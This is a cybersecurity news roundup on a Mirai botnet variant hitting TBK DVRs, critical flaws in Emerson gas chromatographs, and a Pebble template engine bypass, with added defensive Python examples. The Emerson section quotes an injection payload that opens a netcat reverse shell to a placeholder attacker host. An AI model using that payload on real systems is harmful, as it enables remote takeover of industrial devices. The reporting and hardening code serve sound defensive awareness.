
Mirai Botnet Variant is Building Swarm by Exploiting DVR Flaw


A command injection flaw in internet-connected digital video recorders used for CCTV monitoring is the target of a Mirai botnet malware variant, which allows hackers to take over the devices and add them to a botnet. 

Researchers at the Russian cybersecurity firm Kaspersky discovered exploitation of CVE-2024-3721 while analysing logs from their Linux honeypot system. The issue is a command injection vulnerability in internet-connected digital video recorders used for CCTV surveillance. Further analysis showed that the activity belonged to a variant of the Mirai botnet, which exploits this flaw in TBK-manufactured DVR devices to compromise and control them.

The vulnerability was initially discovered by security researcher "netsecfish" in April 2024, who released a proof-of-concept showing how a carefully crafted POST request to a specific URL, with parameters such as mdb and mdc adjusted, can trigger shell command execution. Kaspersky confirmed that this exact technique is being used in the wild: its Linux honeypots are catching ongoing exploitation attempts linked to a Mirai botnet variant that uses netsecfish's proof-of-concept to compromise vulnerable DVRs.

Nearly a decade ago, an anonymous source made the Mirai source code available online, and it continues to serve as the foundation for evolving botnet efforts. The variant aimed at DVR systems builds on that base with extra features such as RC4-based string obfuscation, checks to detect virtual machine environments, and anti-emulation methods.

The attackers use the exploit to deliver a malicious ARM32 binary to the target device, which then connects to a command-and-control server and joins the botnet. The infected device can be used to launch distributed denial-of-service attacks, relay malicious traffic, and carry out other malicious actions.

This Mirai variant uses a basic RC4 routine to decode its internal strings, with the decryption key itself disguised using XOR. After decryption, the strings are stored in a global list and used throughout runtime. To evade analysis, the malware runs anti-virtualization and anti-emulation checks, scanning active processes for indicators of environments such as VMware or QEMU.
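An added example (not code from the Kaspersky report or from the malware itself) of how an analyst reproduces the string-decoding scheme described above: the key is unmasked with a single XOR byte, then each blob is decrypted with RC4. The key, XOR byte and string table are constructed sample data, not values taken from any real sample.

```python
"""Decode RC4-protected strings whose key is hidden behind a single-byte XOR."""
from typing import List


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def recover_key(masked_key: bytes, xor_byte: int) -> bytes:
    """Undo the single-byte XOR mask that hides the RC4 key in the binary."""
    return bytes(b ^ xor_byte for b in masked_key)


def decode_string_table(masked_key: bytes, xor_byte: int, table: List[bytes]) -> List[str]:
    """Recover the key, then decrypt every blob of the embedded string table."""
    key = recover_key(masked_key, xor_byte)
    return [rc4(key, blob).decode("latin-1") for blob in table]


# Constructed sample data (assumed values, not from a real sample). XOR is its own
# inverse, so recover_key() doubles as the masking step when building the sample.
XOR_BYTE = 0x37
PLAIN_KEY = b"s3cr3tk3y"
MASKED_KEY = recover_key(PLAIN_KEY, XOR_BYTE)
SAMPLE_TABLE = [rc4(PLAIN_KEY, s) for s in (b"/proc/", b"vmware", b"qemu")]

if __name__ == "__main__":
    for s in decode_string_table(MASKED_KEY, XOR_BYTE, SAMPLE_TABLE):
        print(s)
```

In a real sample the masked key, XOR byte and blob table would be pulled out of the binary's data section first; the decoder itself does not change.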

Last year, netsecfish reported that around 114,000 DVR devices were exposed to CVE-2024-3721; Kaspersky estimates the figure to be closer to 50,000. Most infections associated with this Mirai variant are found in Brazil, Russia, Egypt, China, India, and Ukraine.

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data


Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution (command injection) flaw in the implementation of the "forced calibration" command. The flaw stems from a call to the system function with a constructed shell command that embeds a user-provided file name without sanitization, allowing an attacker to inject arbitrary shell commands.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.
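An added example, not Emerson's firmware code, contrasting the vulnerable pattern described above (a user-supplied file name interpolated into a shell string that is handed to the system function) with a hardened version that validates the name against a strict allowlist and runs gunzip via an argv list, so shell metacharacters are never interpreted. The directory and file names are assumptions.

```python
"""Vulnerable vs hardened handling of a user-supplied calibration file name."""
import os
import re
import subprocess
from typing import List


def build_calibration_cmd_vulnerable(name: str) -> str:
    """Vulnerable pattern: the name lands inside a shell string (for contrast only).
    A ';' or '|' in the name turns into an extra command when this hits system()."""
    return f"gunzip -c {name} > /tmp/calibration.dat"


# Allowlist: letters, digits, '_', '-', '.'; bounded length; no leading dot.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def is_safe_name(name: str) -> bool:
    """Reject anything that is not a plain file name (metacharacters, traversal)."""
    return bool(_SAFE_NAME.fullmatch(name)) and ".." not in name


def build_calibration_argv(name: str, upload_dir: str = "/data/calibration") -> List[str]:
    """Return the argv list for gunzip; raise ValueError on a rejected name."""
    if not is_safe_name(name):
        raise ValueError("rejected calibration file name: %r" % name)
    # Join to a fixed directory so the caller cannot point at arbitrary paths.
    return ["gunzip", "-c", os.path.join(upload_dir, name)]


def expand_calibration_file(name: str, upload_dir: str, out_path: str) -> int:
    """Run gunzip with no shell involved; its stdout goes to out_path.
    Returns the process exit status."""
    argv = build_calibration_argv(name, upload_dir)
    with open(out_path, "wb") as fh:
        return subprocess.run(argv, stdout=fh, stderr=subprocess.DEVNULL).returncode


if __name__ == "__main__":
    hostile = "calib.gz; id"                           # constructed hostile input
    print(build_calibration_cmd_vulnerable(hostile))   # shell would run two commands
    print(is_safe_name(hostile))                       # False: rejected before any exec
```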

The second vulnerability, CVE-2023-51761, is an authentication bypass: an attacker can calculate a secret passphrase that resets the administrator password. The passphrase is derived from the device's MAC address, which can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase from the MAC address and log in with administrator privileges using credentials of the form EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.

Critical Security Bug Detected in Java Template Framework Pebble


A vulnerability in Pebble, a Java templating engine, could allow an attacker to circumvent its security safeguards and launch command injection attacks against host servers.

Pebble Templates is primarily used to generate HTML output, but it can also be used to produce CSS, XML, JS, and other formats. The templates are popular because of the engine's user-friendly web application templating system, internationalization support, and security features such as auto-escaping and a block-list method access validator intended to thwart command execution attacks.

However, a threat analyst at GitHub has found that, with the right code and template files, Pebble's command execution defense can be bypassed easily.

Circumventing Pebble Security 

The bypass technique works when Pebble is used in combination with Spring, a well-known Java application framework. Multiple Spring classes are registered as beans, allowing them to be loaded dynamically at runtime. The attacker can load one of the Spring objects that supports class loading by abusing the Java beans mechanism.

Subsequently, the attacker can use Jackson, a data-parsing library, to read an XML file specifying a class to instantiate and a method to invoke. This gives a threat actor a way to execute arbitrary code on the host server.

As a proof of concept, the security analyst loaded an XML file from the internet through a Pebble template, then instantiated a Java class that supported executing server-side system commands.

No easy solution yet 

The security bug report has sparked discussion among GitHub researchers. Because the vulnerability has a CVE designation, business systems that rely on the latest version of Pebble are receiving security alerts.

The maintainers are working on a fix, but since Pebble is a community-driven project, it remains unclear when it will be published. The developers have issued a few temporary workarounds to safeguard projects in the interim.

It is worth noting that to exploit the bug, an attacker would need a way to upload a malicious Pebble template to the server. Hence, organizations should tighten security checks on user-provided content and limit template uploads. Businesses can also apply sanitization techniques to spot and neutralize malicious content before using it in a template.